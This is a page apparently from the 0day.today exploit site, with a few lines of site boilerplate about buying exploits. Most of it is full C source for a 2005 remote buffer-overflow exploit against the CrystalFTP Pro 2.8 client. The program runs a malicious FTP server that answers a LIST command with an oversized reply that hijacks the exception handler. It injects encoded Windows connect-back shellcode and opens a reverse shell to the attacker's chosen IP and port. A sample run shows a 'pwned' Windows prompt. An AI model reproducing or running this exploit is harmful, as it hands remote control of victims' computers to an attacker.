0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CrystalFTP Pro 2.8 Remote Buffer Overflow Exploit
[=================================================
CrystalFTP Pro 2.8 Remote Buffer Overflow Exploit
=================================================
/*
* CrystalFTP Pro v2.8 Buffer Overflow Exploit
*
* 04/25/2005
*
* despite the fact that nobody uses CrystalFTP
* i had to release a new version that replaces
* the first one.
*
* this overwrites the structured exception handler
* with a "pop edx pop eax ret" in kernel32.dll.
* this takes us to a pointer of the next SEH.
* just jmp over the SEH itself and reverse code
* gets executed.
*
* add more targets if needed
*
* have phun
*
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ local IP: 192.168.2.102
* --[ incomming connection from: 192.168.2.103
* --[ sending welcome message...done!
* --[ getting login information
* --[ reading USER...done!
* --[ reading PASS...done!
* USER LOGGED IN!
* --[ proceeding...
* --[ reading cmd...done!
* --[ reading cmd...done!
* --[ reading cmd...done!
* --[ entering passive mode...
* --[ passive connection established!
* --[ reading cmd...done!
* --[ user is trying to use "LIST" command
* --[ w00d w00d, let`s kick his ass...
* --[ sending packet [ 711 bytes ]...done!
* --[ confirming...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.103
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\crystalFTP>
*
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
/*
*
* definitions
*
*/
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 21
#define PASV 31337
#define BACKLOG 5
/*
*
* prototypes
*
*/
int isip ( char* ip );
int shell ( int s, char* tip, unsigned short cbport );
char* get_cmd ( int s );
void auth ( int s );
void handle_cmd ( int s, int connfd, char* ip );
void header ();
void start_reverse_handler ();
/*********************
* Windows Shellcode *
*********************/
/*
* Type : connect back shellcode
* Length: 316 bytes
* CBIP : reverseshell[111] ( ^ 0x99999999 )
* CBPort: reverseshell[118] ( ^ 0x9999 )
*
*/
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
unsigned char head[] =
"\x2d\x72\x77\x2d\x72\x2d\x2d\x72\x2d\x2d\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x32\x39\x20\x44\x65\x63\x20\x32"
"\x32\x20\x31\x33\x3a\x33\x37\x20\x63\x79\x62\x65\x72\x74\x72\x6f"
"\x6e\x69\x63\x2e";
char* argv3 = NULL;
/*
*
* functions
*
*/
int
isip ( char* ip )
{
unsigned int a, b, c, d;
sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d );
if ( a < 1 || a > 255 )
return ( 1 );
if ( b < 0 || b > 255 )
return ( 1 );
if ( c < 0 || c > 255 )
return ( 1 );
if ( d < 0 || d > 255 )
return ( 1 );
return ( 0 );
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}
char*
get_cmd ( int s )
{
static char cmd[32];
printf ( "--[" YELLOW " reading cmd..." NORMAL );
if ( read ( s, cmd, 32 ) <= 0 )
{
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
return ( cmd );
}
void
auth ( int s )
{
char user[32], pass[32], out[128];
printf ( "--[ sending welcome message..." );
bzero ( &out, 128 );
strcpy ( out, "220 cybertronicFTP v0.2\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
printf ( "--[ getting login information\n" );
printf ( "--[" YELLOW " reading USER..." NORMAL );
sleep ( 1 );
if ( read ( s, user, 32 ) <= 0 )
{
printf ( RED "failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
sleep ( 1 );
bzero ( &out, 128 );
strcpy ( out, "331 Anonymous FTP server\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( "--[" YELLOW " reading PASS..." NORMAL );
sleep ( 1 );
if ( read ( s, pass, 32 ) <= 0 )
{
printf ( RED "failed\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
sleep ( 1 );
bzero ( &out, 128 );
strcpy ( out, "230 Login successful!\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "\tUSER LOGGED IN!\n" NORMAL );
printf ( "--[ proceeding...\n" );
}
void
handle_cmd ( int s, int s2, char* ip )
{
int listenfd, connfd;
int i = 1;
int tmp[4];
unsigned long ret = 0x77ea5794; //edx eax ret in kernel32.dll
char* a = NULL;
char* cmd;
char out[128], buffer[1024], addr[32];
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
while ( 1 )
{
cmd = get_cmd ( s );
if ( strncmp ( cmd, "PWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 \"/\" is current directory.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "CWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 \"/\" is current directory.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "TYPE", 4 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "200 Type set to A..\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "PASV", 4 ) == 0 )
{
bzero ( &addr, 32 );
a = ( char* ) strtok ( ip, "." );
tmp[0] = ( int ) a;
while ( a != NULL )
{
a = ( char* ) strtok ( NULL, "." );
tmp[i] = ( int )a;
i++;
}
bzero ( &out, 128 );
sprintf( out, "227 Entering Passive Mode. (%s,%s,%s,%s,122,105).\r\n", tmp[0], tmp[1], tmp[2], tmp[3] );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( "--[ entering passive mode...\n" );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "socket failed!\n" NORMAL );
exit ( 1 );
}
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PASV );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( listenfd, 1 ) == -1 )
{
printf ( RED "listen failed!\n" NORMAL );
exit ( 1 );
}
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
close ( listenfd );
printf ( RED "accept failed!\n" NORMAL );
exit ( 1 );
}
close ( listenfd );
printf ( "--[" GREEN " passive connection established!\n" NORMAL );
handle_cmd ( s, connfd, addr );
}
else if ( strncmp ( cmd, "LIST", 4 ) == 0 )
{
printf ( "--[" GREEN " user is trying to use \"LIST\" command\n" NORMAL );
printf ( "--[ w00d w00d, let`s kick his ass...\n" );
bzero ( &buffer, 1024 );
memcpy ( buffer, head, sizeof ( head ) - 1 );
memset ( buffer + 68, 0x90, 255 );
memcpy ( buffer + 321, "\xeb\x46", 2 );
strncat ( buffer, ( unsigned char * ) &ret, 4 );
memset ( buffer + 327, 0x90, 66 );
memcpy ( buffer + 393, reverseshell, sizeof ( reverseshell ) - 1 );
strcat ( buffer, "\r\n" );
bzero ( &out, 128 );
strcpy ( out, "150 Here comes the directory listing.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( "--[ sending packet [ %d bytes ]...", strlen ( buffer ) );
if ( write ( s2, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL);
bzero ( &out, 128 );
strcpy ( out, "226 Transfer ok\r\n" );
printf ( "--[ confirming..." );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL);
close ( s2 );
start_reverse_handler ( argv3 );
}
else
{
bzero ( &out, 128 );
strcpy ( out, "550 command not supported\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
}
}
void
header ()
{
printf ( " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}
void
start_reverse_handler ()
{
int s1, s2;
unsigned short cbport;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
sscanf ( argv3, "%u", &cbport );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!\n" );
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!\n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[" GREEN " incomming connection from:\t" YELLOW " %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
unsigned long xoredip;
unsigned short xoredcbport;
char* ip;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
if ( argc != 3 )
{
printf ( RED "--[ usage: %s <connectback ip> <connectback port>\n" NORMAL, argv[0] );
exit ( 1 );
}
if ( isip ( argv[1] ) != 0 )
{
printf ( RED "--[ enter a valid IP\n" NORMAL );
exit ( 1 );
}
system ( "clear" );
header ();
argv3 = argv[2];
xoredip = inet_addr ( argv[1] ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( atoi ( argv[2] ) ) ^ ( unsigned short ) 0x9999;
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "socket failed!\n" NORMAL );
exit ( 1 );
}
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "listen failed!\n" NORMAL );
exit ( 1 );
}
for ( ; ; )
{
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
close ( listenfd );
printf ( RED "accept failed!\n" NORMAL );
exit ( 1 );
}
if ( ( childpid = fork ( ) ) == 0 )
{
close ( listenfd );
ip = ( char* ) ( argv[1] );
printf ( "--[ local IP: %s\n", ip );
printf ( "--[" GREEN " incomming connection from:\t" YELLOW " %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
auth ( connfd );
handle_cmd ( connfd, ( int ) NULL, ip );
}
close ( connfd );
}
}
# 0day.today [2024-12-26] #